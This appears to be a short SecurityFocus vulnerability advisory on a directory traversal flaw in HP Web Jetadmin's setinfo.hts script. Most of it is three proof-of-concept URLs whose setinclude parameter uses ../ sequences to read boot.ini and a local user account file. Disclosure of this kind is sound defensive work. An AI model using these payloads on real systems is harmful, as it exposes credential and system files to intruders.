HP Web Jetadmin setinfo.hts Script Directory Traversal Vulnerability

No exploit is required.

The following proof of concept has been provided:
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../auth/local.users
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../hpjwja/firmware/printer/test.inc


 

Privacy Statement
Copyright 2010, SecurityFocus